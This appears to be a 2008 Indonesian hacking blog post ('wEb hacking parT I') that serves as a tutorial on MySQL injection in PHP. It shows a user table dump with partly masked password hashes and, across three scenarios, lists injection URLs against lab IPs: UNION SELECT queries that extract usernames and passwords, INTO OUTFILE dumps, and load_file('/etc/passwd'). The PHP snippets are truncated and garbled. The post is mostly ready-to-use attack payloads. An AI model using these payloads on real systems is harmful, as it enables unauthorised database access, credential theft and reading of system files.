nih tutorial cara injection my sql-PHP:
(Dumping MySQL Database)
CREATE TABLE `userlist` (
`id` tinyint(6) NOT NULL auto_increment,
`username` varchar(2 8) NOT NULL,
`status` varchar(2 8) NOT NULL,
`password` varchar(4 8) NOT NULL,
`creation_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
`nama_lengkap` varchar(12 8) NOT NULL,
`status_id` tinyint(6) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;
–
– Dumping data for table `userlist`
–
INSERT INTO `userlist` (`id`, `username`, `status`, `password`, `creation_date`, `nama_lengkap`, `status_id`) VALUES
(1, ‘anxx’, ‘administrator’, ‘8a1465884c097cfa30e332c57exxxxxx’, ‘2007-05-15 21:18:08′, ‘anxxx nightlogin’, 1),
(2, ‘kaxxxx’, ‘operator’, ‘8a1465884c097cfa30e332c57xxxxxx’, ‘2007-05-04 21:18:31′, ‘kaxxxx poseidon’, 2),
(3, ‘bxxx’, ‘operator’, ‘b3f85374ebbdb228c0ad76cd6axxxxxx’, ‘2007-05-04 16:51:32′, ‘Bxxx Erlangga’, 2),
(4, ‘haxxx’, ‘operator’, ‘daa526517139536f056efbb8exxxxxx’, ‘2007-05-04 20:13:31′, ‘Haxxx pekok’, 2);
#############
# SEKENARIO 1
#############
nama_lengkap.”
“;
echo “Username : “.$row->username.”
“;
echo “Status :”.$row->status.”
“;
echo “\n”;
?>
Eksploitasi:
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′ and ‘a’='a
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′ union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=-1′%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=1′%20union%20select%201,1,1,1,1,1,load_file(’/etc/passwd’)%20into%20outfile%20′/var/www/users/kaiten/PENTEST/pwdx.txt’/*
#############
# SEKENARIO 2
#############
nama_lengkap.”
“;
echo “Username : “.$row->username.”
“;
echo “Status :”.$row->status.”
“;
echo “\n”;
?>
Eksploitasi:
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 and 1=0
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 union select 1,1,1,1,1,1,1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=-1%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt’
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=1%20union%20select%201,1,1,1,1,1,load_file(’/etc/passwd’)%20into%20outfile%20′/var/www/users/kaiten/PENTEST/pwd.txt’
#############
# SEKENARIO 3
#############
nama_lengkap.”
“;
echo “Username : “.$row->username.”
“;
echo “Status :”.$row->status.”
“;
echo “\n”;
?>
Eksploitasi:
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=1′)%20and%201=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′) union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=-1′)%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=2/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′)%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt’/*
Note :
/var/www/users/kaiten/PENTEST/ is world writeable (permission 777)
magic_quotes_gpc = Off
I’a really lamme in SQL injection :((
Author : Ph03n1X
URL : http://kandangjamur.net
02 Juli 2008
wEb hacking parT I
Langganan:
Posting Komentar (Atom)
Comments :
0 komentar to “wEb hacking parT I”
Posting Komentar